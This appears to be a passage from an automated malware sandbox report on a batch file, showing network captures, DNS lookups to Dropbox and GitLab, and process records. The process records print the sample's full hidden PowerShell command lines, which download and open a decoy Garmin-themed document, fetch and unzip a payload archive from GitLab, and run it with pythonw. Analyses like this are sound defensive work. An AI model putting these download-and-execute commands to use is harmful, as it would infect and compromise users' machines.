                                                                                                                                                                                                                        Dec 19, 2024 14:20:30.611572981 CET49705443192.168.2.8172.65.251.78
                                                                                                                                                                                                                        Dec 19, 2024 14:20:30.615022898 CET49705443192.168.2.8172.65.251.78
                                                                                                                                                                                                                        Dec 19, 2024 14:20:30.615029097 CET44349705172.65.251.78192.168.2.8
                                                                                                                                                                                                                        Dec 19, 2024 14:20:30.615573883 CET44349705172.65.251.78192.168.2.8
                                                                                                                                                                                                                        Dec 19, 2024 14:20:30.626559019 CET49705443192.168.2.8172.65.251.78
                                                                                                                                                                                                                        Dec 19, 2024 14:20:30.671328068 CET44349705172.65.251.78192.168.2.8
                                                                                                                                                                                                                        Dec 19, 2024 14:20:31.180069923 CET44349705172.65.251.78192.168.2.8
                                                                                                                                                                                                                        Dec 19, 2024 14:20:31.180136919 CET44349705172.65.251.78192.168.2.8
                                                                                                                                                                                                                        Dec 19, 2024 14:20:31.180210114 CET49705443192.168.2.8172.65.251.78
                                                                                                                                                                                                                        Dec 19, 2024 14:20:31.180224895 CET44349705172.65.251.78192.168.2.8
                                                                                                                                                                                                                        Dec 19, 2024 14:20:31.180278063 CET44349705172.65.251.78192.168.2.8
                                                                                                                                                                                                                        Dec 19, 2024 14:20:31.180349112 CET49705443192.168.2.8172.65.251.78
                                                                                                                                                                                                                        Dec 19, 2024 14:20:31.184604883 CET49705443192.168.2.8172.65.251.78
                                                                                                                                                                                                                        Dec 19, 2024 14:20:31.226567030 CET49706443192.168.2.8172.65.251.78
                                                                                                                                                                                                                        Dec 19, 2024 14:20:31.226608992 CET44349706172.65.251.78192.168.2.8
                                                                                                                                                                                                                        Dec 19, 2024 14:20:31.226725101 CET49706443192.168.2.8172.65.251.78
                                                                                                                                                                                                                        Dec 19, 2024 14:20:31.234534025 CET49706443192.168.2.8172.65.251.78
                                                                                                                                                                                                                        Dec 19, 2024 14:20:31.234554052 CET44349706172.65.251.78192.168.2.8
                                                                                                                                                                                                                        Dec 19, 2024 14:20:31.251651049 CET49706443192.168.2.8172.65.251.78
                                                                                                                                                                                                                        Dec 19, 2024 14:20:31.299340010 CET44349706172.65.251.78192.168.2.8
                                                                                                                                                                                                                        Dec 19, 2024 14:20:32.599298000 CET44349706172.65.251.78192.168.2.8
                                                                                                                                                                                                                        Dec 19, 2024 14:20:32.599476099 CET44349706172.65.251.78192.168.2.8
                                                                                                                                                                                                                        Dec 19, 2024 14:20:32.599553108 CET49706443192.168.2.8172.65.251.78
                                                                                                                                                                                                                        Dec 19, 2024 14:20:32.599586010 CET49706443192.168.2.8172.65.251.78

                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                        Dec 19, 2024 14:20:19.139681101 CET5550453192.168.2.81.1.1.1
                                                                                                                                                                                                                        Dec 19, 2024 14:20:19.475780964 CET53555041.1.1.1192.168.2.8
                                                                                                                                                                                                                        Dec 19, 2024 14:20:22.329161882 CET5597753192.168.2.81.1.1.1
                                                                                                                                                                                                                        Dec 19, 2024 14:20:22.615406990 CET53559771.1.1.1192.168.2.8
                                                                                                                                                                                                                        Dec 19, 2024 14:20:29.155438900 CET5096253192.168.2.81.1.1.1
                                                                                                                                                                                                                        Dec 19, 2024 14:20:29.354907036 CET53509621.1.1.1192.168.2.8

                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                        Dec 19, 2024 14:20:19.139681101 CET192.168.2.81.1.1.10x4bc7Standard query (0)www.dropbox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 19, 2024 14:20:22.329161882 CET192.168.2.81.1.1.10x508eStandard query (0)uca83ad3860e00ba9c5292268edd.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 19, 2024 14:20:29.155438900 CET192.168.2.81.1.1.10x9cceStandard query (0)gitlab.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                        Dec 19, 2024 14:20:19.475780964 CET1.1.1.1192.168.2.80x4bc7No error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                        Dec 19, 2024 14:20:19.475780964 CET1.1.1.1192.168.2.80x4bc7No error (0)www-env.dropbox-dns.com162.125.69.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 19, 2024 14:20:22.615406990 CET1.1.1.1192.168.2.80x508eNo error (0)uca83ad3860e00ba9c5292268edd.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                        Dec 19, 2024 14:20:22.615406990 CET1.1.1.1192.168.2.80x508eNo error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 19, 2024 14:20:29.354907036 CET1.1.1.1192.168.2.80x9cceNo error (0)gitlab.com172.65.251.78A (IP address)IN (0x0001)false

                                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                                        • www.dropbox.com
                                                                                                                                                                                                                        • gitlab.com

                                                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        0192.168.2.849704162.125.69.184433324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2024-12-19 13:20:21 UTC192OUTGET /scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1 HTTP/1.1
                                                                                                                                                                                                                        Host: www.dropbox.com
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        2024-12-19 13:20:22 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                                        Content-Security-Policy: object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; base-uri 'self' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; frame-ancestors 'self' https://*.dropbox.com ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; font-src https://* data: ; img-src https://* data: blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox [TRUNCATED]
                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                        Location: https://uca83ad3860e00ba9c5292268edd.dl.dropboxusercontent.com/cd/0/get/Cgi0y-YI8TenZYJubto-r9s_MQQdwDu_micGOUjoiCNyDG3abjg-xLiPRgTDhyBJc_rCV5B_9OPjd6Ut-cuFVhqfy67TiRfcTcMQGJwQB8jTDzUpnstFMAuZFmM9WfK8dO5muoiRo0hic99Wq3xgrMj3/file?dl=1#
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                        Set-Cookie: gvc=MzMzNTM4MjE2NzM5MTg3NTMzODAyNDA1MTM1NjM3NTUyMzY2ODAy; Path=/; Expires=Tue, 18 Dec 2029 13:20:21 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                        Set-Cookie: t=7eFEzW5yg4UGC9FQVug3QC9B; Path=/; Domain=dropbox.com; Expires=Fri, 19 Dec 2025 13:20:21 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                        Set-Cookie: __Host-js_csrf=7eFEzW5yg4UGC9FQVug3QC9B; Path=/; Expires=Fri, 19 Dec 2025 13:20:21 GMT; Secure; SameSite=None
                                                                                                                                                                                                                        Set-Cookie: __Host-ss=x459oKx-yI; Path=/; Expires=Fri, 19 Dec 2025 13:20:21 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                        Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Tue, 18 Dec 2029 13:20:21 GMT
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                        X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                        Content-Length: 17
                                                                                                                                                                                                                        Date: Thu, 19 Dec 2024 13:20:22 GMT
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                        Cache-Control: no-cache, no-store
                                                                                                                                                                                                                        X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                        X-Dropbox-Request-Id: 1095e21d76264657a8dd8fcf6e65563c
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2024-12-19 13:20:22 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                        Data Ascii: ...status=302-->


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        1192.168.2.849705172.65.251.784435512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2024-12-19 13:20:30 UTC95OUTGET /garvdsf/dsfg/-/raw/main/FGa1712.zip HTTP/1.1
                                                                                                                                                                                                                        Host: gitlab.com
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        2024-12-19 13:20:31 UTC453INHTTP/1.1 302 Found
                                                                                                                                                                                                                        Date: Thu, 19 Dec 2024 13:20:31 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Location: https://gitlab.com/users/sign_in
                                                                                                                                                                                                                        CF-Ray: 8f47b0c11bd541ba-EWR
                                                                                                                                                                                                                        CF-Cache-Status: MISS
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Set-Cookie: _gitlab_session=f7776af91b924cb4b1d3c44e23d75a8a; path=/; expires=Thu, 19 Dec 2024 15:20:31 GMT; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                        2024-12-19 13:20:31 UTC2134INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 6e 73 2e 68 74 6d 6c 20 68 74 74 70 73 3a 2f 2f 2a 2e 7a 75 6f 72 61 2e 63 6f 6d 2f 61 70 70 73 2f 50 75 62 6c 69 63 48 6f 73 74 65 64 50 61 67 65 4c 69 74 65 2e 64 6f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                                                                                                                                                        Data Ascii: content-security-policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.googletagmanager.com/ns.html https://*.zuora.com/apps/PublicHostedPageLite.do https://gitlab.com/admin/ https://gitlab.com/assets/
                                                                                                                                                                                                                        2024-12-19 13:20:31 UTC508INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 4c 72 34 63 30 47 51 6b 62 4c 52 75 79 6a 4e 54 54 6c 61 6b 49 5a 65 37 4c 42 75 78 30 25 32 46 35 79 31 6d 64 78 76 41 6d 33 70 52 7a 25 32 42 44 63 65 39 35 35 39 25 32 42 56 39 48 52 64 25 32 46 33 58 35 65 6d 46 76 6a 65 6f 71 7a 68 4d 6e 6a 47 74 6a 63 69 51 42 61 4d 25 32 46 36 44 70 74 75 4d 71 36 45 25 32 46 49 79 6f 75 57 25 32 46 6f 43 79 54 6d 74 49 71 32 46 6e 52 51 35 33 6d 67 68 56 78 43 30 55 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30
                                                                                                                                                                                                                        Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lr4c0GQkbLRuyjNTTlakIZe7LBux0%2F5y1mdxvAm3pRz%2BDce9559%2BV9HRd%2F3X5emFvjeoqzhMnjGtjciQBaM%2F6DptuMq6E%2FIyouW%2FoCyTmtIq2FnRQ53mghVxC0U%3D"}],"group":"cf-nel","max_age":604800
                                                                                                                                                                                                                        2024-12-19 13:20:31 UTC104INData Raw: 36 32 0d 0a 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 75 73 65 72 73 2f 73 69 67 6e 5f 69 6e 22 3e 72 65 64 69 72 65 63 74 65 64 3c 2f 61 3e 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                        Data Ascii: 62<html><body>You are being <a href="https://gitlab.com/users/sign_in">redirected</a>.</body></html>
                                                                                                                                                                                                                        2024-12-19 13:20:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                        Start time:08:20:15
                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\fghdsdf17.bat" "
                                                                                                                                                                                                                        Imagebase:0x7ff780880000
                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                                        Start time:08:20:15
                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                        Start time:08:20:15
                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:chcp.com 437
                                                                                                                                                                                                                        Imagebase:0x7ff6e93a0000
                                                                                                                                                                                                                        File size:14'848 bytes
                                                                                                                                                                                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                        Start time:08:20:15
                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c type tmp
                                                                                                                                                                                                                        Imagebase:0x7ff780880000
                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                        Start time:08:20:15
                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:find
                                                                                                                                                                                                                        Imagebase:0x7ff6b52f0000
                                                                                                                                                                                                                        File size:17'920 bytes
                                                                                                                                                                                                                        MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                        Start time:08:20:15
                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:findstr /L /I set "C:\Users\user\Desktop\fghdsdf17.bat"
                                                                                                                                                                                                                        Imagebase:0x7ff68bd80000
                                                                                                                                                                                                                        File size:36'352 bytes
                                                                                                                                                                                                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                        Start time:08:20:15
                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:findstr /L /I goto "C:\Users\user\Desktop\fghdsdf17.bat"
                                                                                                                                                                                                                        Imagebase:0x7ff68bd80000
                                                                                                                                                                                                                        File size:36'352 bytes
                                                                                                                                                                                                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                        Start time:08:20:15
                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:findstr /L /I echo "C:\Users\user\Desktop\fghdsdf17.bat"
                                                                                                                                                                                                                        Imagebase:0x7ff68bd80000
                                                                                                                                                                                                                        File size:36'352 bytes
                                                                                                                                                                                                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                        Start time:08:20:15
                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:findstr /L /I pause "C:\Users\user\Desktop\fghdsdf17.bat"
                                                                                                                                                                                                                        Imagebase:0x7ff68bd80000
                                                                                                                                                                                                                        File size:36'352 bytes
                                                                                                                                                                                                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                        Start time:08:20:15
                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:find
                                                                                                                                                                                                                        Imagebase:0x7ff6b52f0000
                                                                                                                                                                                                                        File size:17'920 bytes
                                                                                                                                                                                                                        MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                        Start time:08:20:15
                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c type tmp
                                                                                                                                                                                                                        Imagebase:0x7ff780880000
                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                        Start time:08:20:16
                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')"
                                                                                                                                                                                                                        Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                        Start time:08:20:25
                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx'"
                                                                                                                                                                                                                        Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                        Start time:08:20:27
                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')"
                                                                                                                                                                                                                        Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                                        Start time:08:20:39
                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
                                                                                                                                                                                                                        Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                                        Start time:08:20:54
                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\ld_312.pd clickapp"
                                                                                                                                                                                                                        Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                          Executed Functions

